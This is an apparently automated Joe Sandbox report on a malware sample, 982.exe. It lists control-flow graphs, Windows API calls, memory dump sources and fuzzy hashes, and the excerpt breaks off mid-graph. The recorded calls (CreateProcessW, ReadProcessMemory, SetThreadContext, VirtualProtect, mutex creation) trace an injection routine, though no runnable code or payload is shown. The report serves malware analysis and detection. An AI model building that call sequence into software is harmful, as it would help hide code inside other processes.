                  control_flow_graph 35 491980-491a2e call 491000 38 491a35-491a5e call 492860 CreateFileW 35->38 41 491a60 38->41 42 491a65-491a78 38->42 43 491bb9-491bbd 41->43 47 491a7a 42->47 48 491a7f-491a99 VirtualAlloc 42->48 45 491bbf-491bc3 43->45 46 491c05-491c08 43->46 50 491bcf-491bd3 45->50 51 491bc5-491bc8 45->51 49 491c0b-491c12 46->49 47->43 54 491a9b 48->54 55 491aa0-491aba ReadFile 48->55 56 491c14-491c1f 49->56 57 491c67-491c7c 49->57 52 491bd5-491bdf 50->52 53 491be6-491bea 50->53 51->50 52->53 60 491bfd 53->60 61 491bec-491bf6 53->61 54->43 62 491abc 55->62 63 491ac1-491b01 VirtualAlloc 55->63 64 491c21 56->64 65 491c23-491c2f 56->65 58 491c8f-491c97 57->58 59 491c7e-491c89 VirtualFree 57->59 59->58 60->46 61->60 62->43 66 491b08-491b23 call 492ab0 63->66 67 491b03 63->67 64->57 68 491c31-491c41 65->68 69 491c43-491c4f 65->69 75 491b2e-491b38 66->75 67->43 73 491c65 68->73 70 491c5c-491c62 69->70 71 491c51-491c5a 69->71 70->73 71->73 73->49 76 491b6b-491b7f call 4928c0 75->76 77 491b3a-491b69 call 492ab0 75->77 83 491b81 76->83 84 491b83-491b87 76->84 77->75 83->43 85 491b89-491b8d CloseHandle 84->85 86 491b93-491b97 84->86 85->86 87 491b99-491ba4 VirtualFree 86->87 88 491baa-491bb3 86->88 87->88 88->38 88->43
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00491A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00491C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"I
                  • API String ID: 204039940-169408306
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: 7bbb646aaef758745ce5b3ce5ac1dadc49ec458156366565e970234bfd3f75b2
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 89A12C74E00209EBDF14CF94C994BEEBBB5BF48304F2085AAE105BB290D7796A41CB59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00491470, Relevance: 9.4, APIs: 6, Instructions: 383processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 89 491470-491504 call 492a90 * 3 96 49151b 89->96 97 491506-491510 89->97 99 491522-49153b 96->99 97->96 98 491512-491519 97->98 98->99 101 49153d-491540 99->101 102 491545 99->102 103 4918e7-4918e9 101->103 104 49154c-491576 CreateProcessW 102->104 106 491578 104->106 107 49157d-491597 104->107 108 491899-49189d 106->108 114 491599 107->114 115 49159e-4915b9 ReadProcessMemory 107->115 110 49189f-4918a3 108->110 111 4918e5 108->111 112 4918b5-4918b9 110->112 113 4918a5-4918b1 110->113 111->103 116 4918bb-4918be 112->116 117 4918c2-4918c6 112->117 113->112 114->108 118 4915bb 115->118 119 4915c0-4915c9 115->119 116->117 121 4918c8-4918cb 117->121 122 4918cf-4918d3 117->122 118->108 123 4915cb-4915da 119->123 124 4915f2-49160e call 492150 119->124 121->122 127 4918e0-4918e3 122->127 128 4918d5-4918db call 4920a0 122->128 123->124 125 4915dc-4915e4 call 4920a0 123->125 133 491610 124->133 134 491615-491638 call 492290 124->134 132 4915e9-4915eb 125->132 127->103 128->127 132->124 135 4915ed 132->135 133->108 138 49163a-49163e 134->138 139 49167f-4916a0 call 492290 134->139 135->108 141 49167a 138->141 142 491640-491671 call 492290 138->142 145 4916a2 139->145 146 4916a7-4916c5 call 492ab0 139->146 141->108 149 491678 142->149 150 491673 142->150 145->108 152 4916d0-4916da 146->152 149->139 150->108 153 4916dc-49170e call 492ab0 152->153 154 491710-491714 152->154 153->152 156 49171a-49172a 154->156 157 4917ff-49181c call 491ca0 154->157 156->157 158 491730-491740 156->158 165 49181e 157->165 166 491820-49183f SetThreadContext 157->166 158->157 161 491746-49176a 158->161 164 49176d-491771 161->164 164->157 167 491777-49178c 164->167 165->108 168 491841 166->168 169 491843-49184e call 491fd0 166->169 171 4917a0-4917a4 167->171 168->108 175 491850 169->175 176 491852-491856 169->176 173 4917e2-4917fa 171->173 174 4917a6-4917b2 171->174 173->164 177 4917e0 174->177 178 4917b4-4917de 174->178 175->108 179 491858-49185c CloseHandle 176->179 180 49185f-491863 176->180 177->171 178->177 179->180 182 49186c-491870 180->182 183 491865-491869 CloseHandle 180->183 184 491879-49187d 182->184 185 491872-491876 CloseHandle 182->185 183->182 186 49188a-491893 184->186 187 49187f-491885 call 4920a0 184->187 185->184 186->104 186->108 187->186
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 00491571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004915B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: 40aac4f717aedba7d0d6e835892f7ddecd017a59ffb6f19a01f00a19f7dbcdae
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 75F15C74E00209EFDF14DF94C985FEEBBB5BF48304F20816AE615AB290C778A941DB58
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Function 003E002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 3e002d-3e009e call 3e0467 * 6 202 3e00a7-3e00b0 189->202 203 3e00a0-3e00a2 189->203 202->203 205 3e00b2-3e00b6 202->205 204 3e045f-3e0466 203->204 205->203 206 3e00b8-3e00c2 205->206 207 3e00e6-3e0107 GetNativeSystemInfo 206->207 208 3e00c4-3e00c7 206->208 207->203 210 3e0109-3e0133 VirtualAlloc 207->210 209 3e00c9-3e00cf 208->209 211 3e00d6 209->211 212 3e00d1-3e00d4 209->212 213 3e016c-3e0176 210->213 214 3e0135-3e013d 210->214 217 3e00d9-3e00e4 211->217 212->217 215 3e0178-3e017d 213->215 216 3e01b0-3e01c1 213->216 218 3e013f-3e0142 214->218 221 3e0181-3e0194 215->221 222 3e01c3-3e01dd 216->222 223 3e0240-3e024c 216->223 217->207 217->209 219 3e015d-3e015f 218->219 220 3e0144-3e014c 218->220 225 3e0161-3e0166 219->225 220->219 224 3e014e-3e0151 220->224 226 3e0196-3e019f 221->226 227 3e01a5-3e01aa 221->227 239 3e022e-3e023a 222->239 240 3e01df 222->240 228 3e02fc-3e0306 223->228 229 3e0252-3e0269 223->229 231 3e0158-3e015b 224->231 232 3e0153-3e0156 224->232 225->218 233 3e0168 225->233 226->226 234 3e01a1 226->234 227->221 237 3e01ac 227->237 235 3e030c-3e0313 228->235 236 3e03c3-3e03d8 call 491900 228->236 229->228 238 3e026f-3e027f 229->238 231->225 232->219 232->231 233->213 234->227 241 3e0315-3e031e 235->241 261 3e03da-3e03df 236->261 237->216 242 3e02e1-3e02f2 238->242 243 3e0281-3e0285 238->243 239->222 248 3e023c 239->248 246 3e01e3-3e01e7 240->246 249 3e03b8-3e03bd 241->249 250 3e0324-3e033e 241->250 242->238 247 3e02f8 242->247 244 3e0286-3e0295 243->244 251 3e029d-3e02a6 244->251 252 3e0297-3e029b 244->252 253 3e01e9 246->253 254 3e0207-3e0210 246->254 247->228 248->223 249->236 249->241 255 3e0358-3e035a 250->255 256 3e0340-3e0342 250->256 260 3e02cf-3e02d3 251->260 252->251 259 3e02a8-3e02ad 252->259 253->254 264 3e01eb-3e0205 253->264 272 3e0213-3e0228 254->272 262 3e035c-3e035e 255->262 263 3e0373-3e0375 255->263 257 3e034b-3e034e 256->257 258 3e0344-3e0349 256->258 265 3e0350-3e0356 257->265 258->265 266 3e02af-3e02be 259->266 267 3e02c0-3e02c3 259->267 260->244 273 3e02d5-3e02dd 260->273 268 3e045d 261->268 269 3e03e1-3e03e5 261->269 270 3e0364-3e0366 262->270 271 3e0360-3e0362 262->271 274 3e037c-3e0381 263->274 275 3e0377 263->275 264->272 276 3e0384-3e03ae VirtualProtect 265->276 266->260 267->260 277 3e02c5-3e02cb 267->277 268->204 269->268 278 3e03e7-3e03f1 269->278 270->263 280 3e0368-3e036a 270->280 279 3e0379-3e037a 271->279 272->246 281 3e022a 272->281 273->242 274->276 275->279 276->203 284 3e03b4 276->284 277->260 278->268 282 3e03f3-3e03f7 278->282 279->276 280->276 283 3e036c-3e0371 280->283 281->239 282->268 285 3e03f9-3e040a 282->285 283->276 284->249 285->268 286 3e040c-3e0411 285->286 287 3e0413-3e0420 286->287 287->287 288 3e0422-3e0426 287->288 289 3e043e-3e0444 288->289 290 3e0428-3e043a 288->290 289->268 292 3e0446-3e045c 289->292 290->286 291 3e043c 290->291 291->268 292->268
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,003E0005), ref: 003E00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,003E0005), ref: 003E0113
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: cbfe8298b61e497efe309f90620b599b7266558e5100ec4ffa4d216141003c19
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: 8FE1E4756043A68FDB19CF5AC88472AB3E0FF84304F19462DE9859B6C1E7B4EC85CB91
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00491900, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 491900-491978 call 4918f0 call 491000 call 491470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 0049196E
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: fdf5bb08d7d182b480b3275947af2a0a5b7444ac3af229539786070da55c6d65
                  • Instruction ID: c4b771bc32017f47c2cf20100fbed47f53cef4cd5a389e590e2841fa0a5cbbf0
                  • Opcode Fuzzy Hash: fdf5bb08d7d182b480b3275947af2a0a5b7444ac3af229539786070da55c6d65
                  • Instruction Fuzzy Hash: CDF0C231D001099BEF10EFB5C8017DEFBB9EB44314F00806BAA0467241FA351A1ACBD5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 00492AD0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 492ad0-492ada 303 492afd 302->303 304 492adc-492ae7 IsWow64Process 302->304 305 492aff-492b01 303->305 306 492ae9-492aef 304->306 307 492af1 304->307 308 492af8-492afb 306->308 307->308 308->305
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 00492AE2
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 938b23ecceea6701bddc29f128f89f1d47f3dd53a5f25c7c552846ba9f2cb508
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: 53E01A32945248EBCF24DE988A447EE7BB8BB00311F100266E81192280D7B99E45E795
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  Function 003E48C1, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P>
                  • API String ID: 2102423945-2683032675
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: 32ddaf97aecfcd05b134fa1a5580021772929d3206dc4b262859381be3641460
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: A1025D309006BAEFCB1BCF29C9956FAB775FF08300F240269C55597A82D732B965CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 003E50E8, Relevance: 1.7, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bce4fb890819c2db83a58ab38be853a66c898c16f1fcb0fea0736f78ff77f596
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 1A022270511FA08FCB76CA2AC680666B7F1BF547287604E2EC6E786E91D632F845CF14
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 003E50E4, Relevance: 1.5, Strings: 1, Instructions: 239UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: ff9ca01698094b98b67ac26334a6b33bd391c6fdfb0575a6f1cd48a8c28c91d6
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: 97A12430511FA18FCB76CF2AC684666B7F1BF54718B504E2ED6E786A91D631F881CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00492970, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: 66947f5a451ff6398d8b50381645664c8fb550731e170b2b6266c1f768105378
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 2B41D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB40
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E22AF, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: 8a295e84d98703089f8c991542c374d307de86eab711fd1dc53ca8fe8e586579
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: D841C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E0467, Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: a6268aa1a12c76abe65c36f4bb2ff502a81696beb927c03f5fbbd43952843c08
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 513105365043968FC715DF1AC580A2AB3F4FF89304F460AADE59187382D370F9468F91
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00470E18, Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302663285.00470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_470000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: cc050b441e4cb905eeb7c61647b0d4e5091dc002273e0e23abf24b49541f2bef
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: A91170B2341100DFD754DF55DC81EE673EAEB88320B29845AE908CB312D679E802C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00492860, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 922ec6e8da41095b27cb237f12f3c9716c62955ae42080a057c2cf1bd02e9ecf
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: EA019674E11109EFCB44DF99C6909AEFBB5FF48310F2086AAD819A7341D774AE41DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00492800, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 969e8a1771733a686e7e89059cf29653376eb0e774e9c6e403b83b5c436d0b8a
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: 20019674E01109EFCB44DF98C6909AEFBB5FF48310F2086AAD819A7301D774AE41DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E213F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: ccea1498e9dcd4a6f2d1b8edf8d4b891009289f168165882cd5ee3fae74e037a
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: B6019278E00249EFCB49DF99C5909AEF7B9FF48310F208699E909A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E219F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: b7929d17dcb49ff70fc1aa94fe6094c37578c5ee191ac4d5bcbbe5b486f617ce
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: DE01D278A00248EFCB44DF99C5909AEF7B9FF48310F208299E909A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E2C0C, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: 9635907dda9a5e17e282c30758ca44114b1cbff450376e79b1047c8b36c29783
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 91E04F333104A08BC622DA96D4C096BF3ADEB843B033A0969D54697A51C620BC009640
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E3743, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Analysis Process: 982.exe PID: 3600 Parent PID: 3696 982.exeUNIQUE

                  Execution Graph

                  Execution Coverage:30.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:13.5%
                  Total number of Nodes:497
                  Total number of Limit Nodes:3

                  Graph

                  execution_graph 3427 402561 GetProcessHeap 3428 40257b 3427->3428 2803 40f072 2820 40cace 2803->2820 2808 40f0a8 2830 401a52 2808->2830 2810 40f0b9 2811 40f0d5 GetCommandLineW lstrlenW lstrlenW 2810->2811 2812 40f119 2811->2812 2813 40f120 2812->2813 2814 40f0fa lstrcmpiW 2812->2814 2844 401cc2 2813->2844 2814->2812 2815 40f10c 2814->2815 2834 40c84e GetTickCount 2815->2834 2849 4012cd GetPEB 2820->2849 2822 40db70 2851 4012ff 2822->2851 2824 40db7d 2825 40db84 2824->2825 2826 4012cd GetPEB 2825->2826 2827 40f05e 2826->2827 2828 4012ff 2 API calls 2827->2828 2829 40f06b GetModuleFileNameW 2828->2829 2829->2808 2831 401a70 2830->2831 2869 4014f2 GetProcessHeap 2831->2869 2833 401a84 2833->2810 2833->2833 2871 40c493 GetWindowsDirectoryW 2834->2871 2839 40c8a5 ExitProcess 2840 40c875 WaitForSingleObject 2841 40c88f 2840->2841 2841->2839 2889 40c78f 2841->2889 2843 40c894 WaitForSingleObject 2843->2841 2845 401503 memset 2844->2845 2846 401cd9 2845->2846 2847 401d03 ExitProcess 2846->2847 2848 401d0f CloseHandle CloseHandle 2846->2848 2848->2847 2850 4012e2 2849->2850 2850->2822 2852 401306 2851->2852 2854 401224 2851->2854 2852->2824 2853 4012c3 2853->2824 2854->2853 2855 4012a7 2854->2855 2857 401192 2855->2857 2858 4011a3 2857->2858 2859 4012cd GetPEB 2858->2859 2860 4011f3 2859->2860 2861 4011f7 LoadLibraryW 2860->2861 2862 401208 2860->2862 2861->2862 2863 40121a 2861->2863 2865 401224 2862->2865 2863->2854 2866 4012c3 2865->2866 2867 401260 2865->2867 2866->2863 2867->2866 2868 401192 2 API calls 2867->2868 2868->2867 2870 401502 2869->2870 2870->2833 2872 40c4f1 2871->2872 2874 40c4b2 GetVolumeInformationW 2871->2874 2875 40c601 2872->2875 2874->2872 2919 40c4f5 2875->2919 2877 40c609 2878 40c60d WaitForSingleObject 2877->2878 2879 40c67d 2877->2879 2880 40c624 2878->2880 2879->2839 2879->2840 2880->2879 2923 40c54e 2880->2923 2882 40c62d 2883 40c665 ReleaseMutex CloseHandle 2882->2883 2927 40c5a7 2882->2927 2883->2879 2885 40c636 2885->2883 2886 40c63a SignalObjectAndWait 2885->2886 2887 40c653 2886->2887 2888 40c657 ResetEvent 2886->2888 2887->2883 2887->2888 2888->2883 2890 40c79a 2889->2890 2891 40c80f 2889->2891 2892 40c7c9 2890->2892 2893 40c79d 2890->2893 2966 40632a 2891->2966 2931 408922 2892->2931 2896 40c7a0 2893->2896 2897 40c7b8 2893->2897 2900 40c7a7 SetEvent 2896->2900 2901 40c840 2896->2901 3003 40c682 GetTickCount 2897->3003 2900->2901 2901->2843 2911 40c822 2913 40c82c GetTickCount 2911->2913 2913->2843 2918 40c7e9 2918->2901 2918->2911 2918->2913 2920 401a52 GetProcessHeap 2919->2920 2921 40c50e 2920->2921 2922 40c52d CreateMutexW 2921->2922 2922->2877 2924 401a52 GetProcessHeap 2923->2924 2925 40c567 2924->2925 2926 40c586 CreateMutexW 2925->2926 2926->2882 2928 401a52 GetProcessHeap 2927->2928 2929 40c5c0 2928->2929 2930 40c5df CreateEventW 2929->2930 2930->2885 2932 401a52 GetProcessHeap 2931->2932 2933 408c9b LoadLibraryW 2932->2933 2934 408cb0 2933->2934 2935 4012ff 2 API calls 2934->2935 2936 408ccd 2935->2936 2937 408cd5 2936->2937 2938 401a52 GetProcessHeap 2937->2938 2939 409bc0 LoadLibraryW 2938->2939 2940 409bd5 2939->2940 2941 4012ff 2 API calls 2940->2941 2942 409bf5 2941->2942 2943 409bfd 2942->2943 2944 401a52 GetProcessHeap 2943->2944 2945 40a28c LoadLibraryW 2944->2945 2946 40a2a1 2945->2946 2947 4012ff 2 API calls 2946->2947 2948 40a2c1 2947->2948 2949 40a2c9 2948->2949 2950 401a52 GetProcessHeap 2949->2950 2951 40b678 LoadLibraryW 2950->2951 2952 40b68d 2951->2952 2953 4012ff 2 API calls 2952->2953 2954 40b6ad 2953->2954 2955 40b6b5 2954->2955 2956 401a52 GetProcessHeap 2955->2956 2957 40c456 LoadLibraryW 2956->2957 2958 40c46b 2957->2958 2959 4012ff 2 API calls 2958->2959 2960 40c48b 2959->2960 2961 4060c5 2960->2961 2962 406101 2961->2962 2963 4060e9 2961->2963 2962->2918 2963->2963 3036 401ffc 2963->3036 2965 4060ff 2965->2918 2967 401a52 GetProcessHeap 2966->2967 2968 407689 LoadLibraryW 2967->2968 2969 40769e 2968->2969 2970 4012ff 2 API calls 2969->2970 2971 4076be 